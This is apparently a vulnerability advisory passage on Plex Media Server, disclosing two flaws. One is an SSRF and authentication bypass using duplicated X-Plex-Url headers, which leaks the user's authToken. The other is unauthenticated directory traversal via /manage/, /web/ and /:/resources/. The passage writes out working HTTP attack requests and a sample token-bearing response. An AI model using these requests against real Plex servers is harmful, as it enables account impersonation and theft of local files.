1. Authentication bypass / Server Side Request Forgery (SSRF)
The following GET request bypasses the webserver whitelist. 

GET /system/proxy HTTP/1.1
Host: <PLEX_WAN_HOST>
X-Plex-Url: http://www.example.com:32400/myplex/account?IRRELEVANT=
X-Plex-Url: http://my.plexapp.com/


The last X-Plex-Url header value "http://my.plexapp.com/"; is contained in
the whitelist (Regex) and passes validation. The request is then processed by
the actual request handler in the backend webserver (Python). Here both header
values are concatenated using a comma. This way the actual URL that is
requested is controlled by the first X-Plex-Url value.
By indicating a parameter (called IRRELEVANT) the second X-Plex-Url value is
dissolved.

This results in the following request (made by Plex Media Server):

GET /myplex/account?IRRELEVANT=,http://my.plexapp.com/ HTTP/1.1
Host: localhost:32400
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.2b4) Gecko/20091124 Firefox/3.6b4 (.NET CLR 3.5.30729)
Connection: close
Accept: */*
Accept-Encoding: gzip


The response for this request is passed to the attacker and includes the
authToken value ("master token"), which can be used to impersonate legitimate
Plex users. Of course other administrative actions can be performed as well.

<?xml version="1.0" encoding="UTF-8"?>
<MyPlex authToken="<REMOVED>" username="<REMOVED>" mappingState="mapped" mappingError="" mappingErrorMessage="1" 
signInState="ok" publicAddress="1" publicPort="9415" privateAddress="1" privatePort="32400" 
subscriptionFeatures="cloudsync,pass,sync" subscriptionActive="1" subscriptionState="Active">
</MyPlex>


A video demonstrating this issue has been released by SEC Consult:
http://www.youtube.com/watch?v=f99fm4QU9u8


2. Unauthenticated local file disclosure
The following requests show different functionality that is vulnerable to
directory traversal:

GET /manage/..\..\..\..\..\..\..\..\..\..\secret.txt HTTP/1.1
Host: <HOST>

GET /web/..\..\..\..\..\..\..\..\..\..\secret.txt HTTP/1.1
Host: <HOST>

GET /:/resources/..\..\..\..\..\..\..\..\..\..\secret.txt HTTP/1.1
Host: <HOST>

The /manage/ and /web/ handlers can be exploited without prior authentication.
This vulnerability was confirmed on Windows.